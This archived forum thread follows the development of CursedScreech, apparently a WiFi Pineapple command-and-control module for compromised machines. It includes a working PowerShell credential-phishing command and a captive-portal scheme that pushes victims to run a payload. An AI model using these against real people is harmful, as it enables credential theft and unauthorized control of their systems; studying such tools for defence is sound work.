sud0nick Posted February 25, 2016 Posted February 25, 2016 Edit: A test version First major release is now on my GitHub at https://github.com/sud0nick/CursedScreech. The C# API, Python API, and documentation are also there. I started working on a new module and I'll keep this thread up to date as I work on it. I'm much farther along with it than I thought I would be at this point so hopefully it won't be too long before it's initial release. Purpose: • Securely control compromised systems on the network by sending commands to them all at once, one at a time, or to a custom group. Features: • Commands sent via TLS (level negotiated by systems; highest available is chosen) • Execute shell commands on all targets at once or those selected and receive responses individually. • Store commands for quick reuse. • Utilize the Certificate Store in Papers for TLS keys. • Multi-threaded python scripts that listen for compromised systems on the network and do your bidding. This is an advanced module that will require some programming knowledge (not to use the module itself but for payloads that are required). I plan on including a small API that you can import into your payload so it will work seamlessly with CursedScreech. Default EZ Commands are as follows: Get PS Version Get SysInfo Windows PSv3+ Phish Windows PSv2- Phish Windows Alert Logoff User Restart Shutdown Add User Change User Password Delete User Enable RDP Add User to Remote Desktop Users Group Add User to Administrators Group And a video tutorial
sud0nick Posted February 26, 2016 Author Posted February 26, 2016 Since I've had a lot of time on my hands I've made some good progress with this module. Still not complete but here are a couple screenshots of the types of attacks you'll be able to perform with it. In this first image I issued a PowerShell command to one of my targets (which was the same system I was using) which prompted for credentials using a PSCredential object. This particular command decodes the password and sends it back in plaintext with the username (no worries though cus it's over TLS 1.2). Command Issued: powershell "Get-Credential -User $(whoami).Split('\')[1] -Message 'Windows requires your credentials to continue' | % {Write-Host $_.UserName '->' $_.GetNetworkCredential().password}" Then I issued powershell "Get-Process" just to add more content to the example. Here is the screenshot of the returned data. I hope to have an initial release on GitHub by next week. I probably won't release to the Module Manager until I get an API developed for payloads to use with this module.
dustbyter Posted February 26, 2016 Posted February 26, 2016 What does your agent look like that sits on the compromised pc? Will it not really matter what the agent is as long as it implements the API to talk back to the module? I can see this as being a universal C&C panel that can control any agent on a machine that decides to implement the interface you will expose through the API.
sud0nick Posted February 26, 2016 Author Posted February 26, 2016 What does your agent look like that sits on the compromised pc? Right now I have two custom programs, one written in C# and the other in Python. I prefer C# since I can compile everything into a single executable (even the certificates) but I know not everyone is comfortable with C#. Will it not really matter what the agent is as long as it implements the API to talk back to the module? That's the idea. The way I plan on implementing this is to first write two separate libraries (one for C# and one for Python) and include them with the module. Each time the settings of the module are modified the library code will be updated to match these settings. Then you'll be presented with the option to download the updated libraries so they can easily be imported into your projects. Any time you modify the settings you'll need to download and re-import the library unless if you know which settings in the code to modify (which is honestly only a couple variables and will be super simple). The main goal is to be able to push commands out to all compromised systems on the network no matter how you choose to compromise those machines, similar to a mini botnet. I will implement stored commands that can be issued as keywords and translate into system commands (similar to how Foxtrot did with his module, Commander). So, for instance, you could shut down all machines on the network at once, phish for all of their passwords, or select just a few of them to target. There's still a lot to be done in making this module more user friendly but as you can see from the pictures in my last post the backend is functional. I'll be sure to do a video demonstrating all features and how to implement the API in your own code before I release it.
ale Posted February 27, 2016 Posted February 27, 2016 Wow sud0nick! Great moves! keep it up! proud of you!
dustbyter Posted February 27, 2016 Posted February 27, 2016 Pretty cool! I myself also prefer C# over python.. but had to learn some python since getting the pineapples. Looking forward to this!
sud0nick Posted February 28, 2016 Author Posted February 28, 2016 Wow sud0nick! Great moves! keep it up! proud of you! Thanks, ale! I'm really trying to come up with serious hacking tools. I may not have zero days yet but I feel I'm improving. Pretty cool! I myself also prefer C# over python.. but had to learn some python since getting the pineapples. Looking forward to this! I prefer the result of C# (self-contained .exe) but I still think Python is much easier to implement . I think setting next week as an initial release time was a little ambitious of me. I'm definitely making a lot of progress but I'm new to writing APIs. I'm working on the C# one now but I have a feeling it's going to take a bit of testing. Here is my todo list in order of execution: Finish C# API Write equivalent Python library Put finishing touches on web interface Test, Test, Test Create documentation and video guide Release on Module Manager I'll update this post by crossing things off the list as I finish them. Edit: A test version is now on my GitHub at https://github.com/sud0nick/CursedScreech. The C# API, Python API, and documentation are also there.
sud0nick Posted March 5, 2016 Author Posted March 5, 2016 The first major release of CursedScreech is on GitHub (link in the first post). I have performed a lot of tests and tweaked many things over the last few days. I won't submit it to the module manager until I get a video made for it but I will hopefully have that done by the end of the weekend. A couple things to keep in mind: This module can only be used on the TETRA for now. I believe there are some underlying SSL problems on the NANO that still haven't been resolved and TLS/SSL is required for this module (see below for more). Python takes a few seconds to load for some reason. I've submitted an official bug report with results from a test python script that showed it takes about 7 seconds just for Python to start up. Because of this, be patient when starting Kuro. It will let you know when it's connecting, when a connection to a target has been established, and when it's ready for you to start entering commands. I've put quite a bit of effort into this module so I hope you all find it very useful. For those that only use a NANO,and won't be able to use this module, I plan on porting this to a Linux utility so you can still use it in your pentests just without the pretty front end. Please download a copy from GitHub, test it out, and report any issues here. If there is anything to fix I will make sure it happens before I submit it to the module manager. Edit: v1 has been submitted to the module manager.
sud0nick Posted March 7, 2016 Author Posted March 7, 2016 CursedScreech is now available on the Module Manager!
513RR4 Posted March 10, 2016 Posted March 10, 2016 Hi sud0nick! your module seems amazing!! but i have some problems: I follow all your instructions of the video to create the payload but when i execute it says "payload has stopped working" i tried in w10 x64 and a virtual machine with w7 ultimate x32 with the tetra 1.0.2. I used settings by default in the module and create the certificates with the Papers module. Created not encrypted keys for Kuro. And used Export keys to PKCS#12 container for Target. Please help me.
sud0nick Posted March 11, 2016 Author Posted March 11, 2016 Do you mean the payload stops working on the target? It should work by default on win 10 but maybe in win 7 it needs an upgraded version of .NET? Could you give more details?
513RR4 Posted March 11, 2016 Posted March 11, 2016 Yes stops in the target computer. I pressed the debug button of windows and get redirected to visual studio and shows this.
sud0nick Posted March 11, 2016 Author Posted March 11, 2016 Could you post your code for the payload?
sud0nick Posted March 12, 2016 Author Posted March 12, 2016 It looks like your name space is payload (with a lowercase p) but you are referencing the .pfx with Payload (with a capital P). Make sure they match so it can access the keys for the target.
513RR4 Posted March 12, 2016 Posted March 12, 2016 It looks like your name space is payload (with a lowercase p) but you are referencing the .pfx with Payload (with a capital P). Make sure they match so it can access the keys for the target. Ok I'll try it and comment the results. Thanks for your help.
sud0nick Posted March 12, 2016 Author Posted March 12, 2016 On second thought it needs to match the name of the solution/project. Don't change the namespace name but change the reference to the keys. It should be payload.Target.pfx
513RR4 Posted March 12, 2016 Posted March 12, 2016 I created a new "Payload" (with capital p) now the namespace is equal with the reference keys but still with the same issue.
sud0nick Posted March 12, 2016 Author Posted March 12, 2016 Did you make sure to make the pfx an embedded resource? What happens if you run the payload within VS? It should show you the line of code that's failing.
513RR4 Posted March 13, 2016 Posted March 13, 2016 Ok when i create the new Payload i forgot to put the Target.pfx as an embedded resource, i changed that and now the Payload runs without problems. I sorry for my noob mistakes but i am happy for your help thanks. When i run the working Payload on a target machine in this case a virtual machine with w7 x32 that is connected to the wifi pineapple network, i start Sein and nothing happens. So i saw your video again and see that your target ip address is 192.168.1.X so i connect the w7 virtual machine to my home network (where i have the tetra connected via ethernet) and the module works very well. I am confused about this. Why the target is not recognised by Sein when is connected to the pineapple network?
sud0nick Posted March 13, 2016 Author Posted March 13, 2016 Hmm, I'll have to check on this. It seems to work for me. I just tried with the Python payload on my Mac connected on the Pineapple's network and it showed up in Sein.
lild4d Posted March 23, 2016 Posted March 23, 2016 These are the kind of modules Ive been waiting for
sud0nick Posted July 24, 2016 Author Posted July 24, 2016 I've updated the API in this module to include a class that integrates with the Payloader injection set in Portal Auth. What this means is you can now add authorization to your payloads to force your targets to execute them. A brief example follows: • First clone a captive portal with the Payloader injection set • Build your payload in Cursed Screech by downloading the pre-built payload files and following my video tutorials • Turn on PASS in Portal Auth • Attach your payload to your captive portal • Turn on Evil Portal When the target reaches your cloned portal they will be prompted to enter an access key which they can receive by downloading and executing your payload. When they execute the payload, it will reach out to the PASS server in Portal Auth which will generate the access key, store it, and return it to the payload. The user will enter the key in the captive portal and gain access to the network. At this point all of the normal CursedScreech stuff will come into play. This update is only available on my GitHub for now. The reason for this is I've run into an issue I can't seem to figure out (the same issue the 513RR4 had a few posts above). When I tested this back in March I couldn't reproduce the problem but months later it seems to be plaguing me. I need someone else to perform some tests if they have time and let me know if they see their targets appear in the target list. If you need any help in testing you can ask me or just watch the CursedScreech tutorial video posted at the top of this thread. The video will walk you through everything. Once I have this issue figured out I will push an update to the module manager.
Recommended Posts
Archived
This topic is now archived and is closed to further replies.